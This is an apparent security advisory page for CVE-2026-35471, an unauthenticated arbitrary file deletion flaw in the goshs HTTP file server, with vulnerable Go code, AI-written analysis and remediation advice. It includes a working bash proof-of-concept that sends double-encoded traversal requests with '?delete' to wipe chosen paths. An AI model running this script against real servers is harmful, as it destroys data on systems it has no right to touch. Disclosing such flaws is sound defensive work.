Suse
CVE-2026-35471
CRITICAL
Severity by source
AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Primary rating from GitHub Advisory.
CVSS VectorGitHub Advisory
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Lifecycle Timeline
3DescriptionGitHub Advisory
Summary
deleteFile()missing return after path traversal check |httpserver/handler.go:645-671
The finding affects the default configuration, no flags or authentication required.
Details
File: httpserver/handler.go:645-671 Trigger: GET /<path>?delete (handler.go:157-160 dispatches to deleteFile)
The function detects .. in the decoded path but does not return.
func (fs *FileServer) deleteFile(w http.ResponseWriter, req *http.Request) {
upath := filepath.FromSlash(filepath.Clean("/" + strings.Trim(req.URL.Path, "/")))
fileCleaned, _ := url.QueryUnescape(upath)
if strings.Contains(fileCleaned, "..") {
w.WriteHeader(500)
_, err := w.Write([]byte("Cannot delete file"))
if err != nil {
logger.Errorf("error writing answer to client: %+v", err)
}
// BUG: no return, falls through to os.RemoveAll
}
deletePath := filepath.Join(fs.Webroot, fileCleaned)
err := os.RemoveAll(deletePath) // always executesRoot causes: Missing return after the guard makes the check dead code
Impact: Unauthenticated arbitrary file/directory deletion.
PoCs:
#!/usr/bin/env bash
# Delete an arbitrary file/directory on a running goshs instance.
# Usage: ./arbitrary_delete.sh <host> <port> <absolute-path-to-delete>
set -euo pipefail
HOST="${1:?Usage: $0 <host> <port> <absolute-path-to-delete>}"
PORT="${2:?Usage: $0 <host> <port> <absolute-path-to-delete>}"
TARGET="${3:?Usage: $0 <host> <port> <absolute-path-to-delete>}"
# Double-encode ".." => %252e%252e
# We don't know the webroot depth, so use 16 levels (covers most paths).
TRAVERSAL=""
for _ in $(seq 1 16); do
TRAVERSAL="${TRAVERSAL}%252e%252e/"
done
# Strip leading / from target and URL-encode any special chars
TARGET_REL="${TARGET#/}"
ENCODED_TARGET=$(python3 -c "import urllib.parse; print(urllib.parse.quote('$TARGET_REL', safe='/'))")
URL="http://${HOST}:${PORT}/${TRAVERSAL}${ENCODED_TARGET}?delete"
echo "[*] Target: ${TARGET}"
echo "[*] Request: GET ${URL}"
echo ""
HTTP_CODE=$(curl -s -o /dev/null -w "%{http_code}" "$URL")
echo "[*] HTTP ${HTTP_CODE}"To execute it: ./arbitrary_delete.sh 10.1.2.2 8000 /tmp/canary
---
Recommendations
Checking that the targeted file is part of the webroot could prevent these attacks. Also, ensure that the method return is called after every error response.
AnalysisAI
Unauthenticated arbitrary file deletion in goshs HTTP file server allows remote attackers to delete any file or directory on the host system via path traversal. A missing return statement after input validation enables attackers to bypass the '..' check by double-encoding traversal sequences (e.g., %252e%252e), sending requests to '/<traversal>/<target-path>?delete' to trigger os.RemoveAll on arbitrary filesystem paths. The vulnerability affects the default configuration with no authentication or special flags required. Public exploit code exists with a working proof-of-concept shell script demonstrating the attack. CVSS 9.8 (Critical) reflects network accessibility, no authentication requirement, and complete impact to integrity and availability. Vendor-released patch available via GitHub commit 237f3af.
Technical ContextAI
The vulnerability exists in the goshs Go-based HTTP file server's deleteFile function (httpserver/handler.go:645-671). When handling GET requests with a '?delete' query parameter, the code attempts to sanitize user input by checking for '..' sequences after URL-decoding the path. However, a critical logic error allows execution to fall through to os.RemoveAll even when path traversal is detected. The root cause is CWE-22 (Improper Limitation of a Pathname to a Restricted Directory) combined with a missing return statement after the validation check. Attackers exploit this by double-encoding traversal sequences (%252e%252e becomes '..' after the first decode layer), bypassing the string-contains check while still achieving directory traversal. The filepath.Join operation concatenates the webroot with the attacker-controlled path, but insufficient traversal depth in the payload allows escaping the webroot boundary. The Go package identifier pkg:go/github.com_patrickhener_goshs confirms this affects the patrickhener/goshs project.
RemediationAI
Upgrade to goshs version containing commit 237f3af891a90df9b903b85f1cd3438040ca261a or later, which addresses the missing return statement and improves path traversal validation. The patch is available at https://github.com/patrickhener/goshs/commit/237f3af891a90df9b903b85f1cd3438040ca261a. Organizations unable to immediately upgrade should disable the delete functionality by blocking HTTP requests containing the '?delete' query parameter at the reverse proxy or firewall level, or restrict goshs network access to trusted administrative networks only. Review filesystem permissions to ensure the goshs process runs with minimal privileges and cannot delete critical system files. Consult the vendor security advisory at https://github.com/patrickhener/goshs/security/advisories/GHSA-6qcc-6q27-whp8 for additional guidance. Audit logs for suspicious DELETE operations or requests containing encoded traversal sequences (%252e patterns) to identify potential exploitation attempts.
Same weakness CWE-22 – Path Traversal
View allSame technique Path Traversal
View allVendor StatusVendor
SUSE
Severity: Critical| Product | Status |
|---|---|
| openSUSE Tumbleweed | Fixed |
Share
External POC / Exploit Code
Leaving vuln.today
GHSA-6qcc-6q27-whp8